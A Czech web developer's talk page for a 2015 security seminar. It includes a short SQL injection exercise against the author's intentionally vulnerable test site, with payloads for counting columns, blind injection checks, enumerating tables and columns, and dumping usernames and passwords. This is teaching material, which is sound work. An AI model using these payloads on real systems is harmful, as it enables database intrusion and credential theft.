Check the online version, I often update my slides.
Talk detail
Několik nejčastějších bezpečnostních chyb a jak se proti nim bránit a co všechno udělat pro to, abychom měli všichni klidnější spaní.
SQL Injection si můžete zkusit na mém testovacím webu na adrese http://exploited.cz/…products.php. Měl by vás zajímat parametr id
, který je sice ošetřen pomocí mysql_real_escape_string()
, ale v tomto případě to není nic platné, protože aplikace očekává číslo a vstup není uzavřen do apostrofů. Jeho změnou můžete zkusit:
- zjistit počet sloupců v dotazu
SELECT ... FROM
:id=1 ORDER BY 1
id=1 ORDER BY 5
id=1 UNION SELECT 1,2,3,4
- ověřit Blind SQL Injection:
id=1 AND 1=1
id=1 AND 1=2
id=1 AND SUBSTRING(VERSION(),1,6)=0x352e352e3238
- zjistit, nějaké informace:
- aktuální databázi a verzi serveru:
id=1 UNION SELECT 1,DATABASE(),VERSION(),4
- jména tabulek a sloupců, ke kterým má uživatel přístup
id=1 UNION SELECT 1,table_name,column_name,4 FROM information_schema.columns
- aktuální databázi a verzi serveru:
- zjistit uživatelská jména a špatně uložená hesla:
id=1 UNION SELECT 1,username,password,4 FROM users
Přijďte si o webové bezpečnosti pro vývojáře popovídat na školení Bezpečnost PHP aplikací (next date: March 15–18, 2021 remote). Vytváříte bezpečná hesla a máte zabezpečený prohlížeč? Že nevíte jak na to? Prozradím vám to na školení Bezpečnost pro uživatele (next date: termín zatím nevypsán).
Date and event
March 6, 2015, Seminář Web Inkognito na VŠE 2015
I build web applications and I'm into web application security. I like to speak about secure development. My mission is to teach web developers how to build secure and fast web applications and why.
Public trainings
Come to my public trainings, everybody's welcome:
PHP application security
(March 15–18, 2021 )
HTTPS for developers and admins
(March 23–24, 2021 )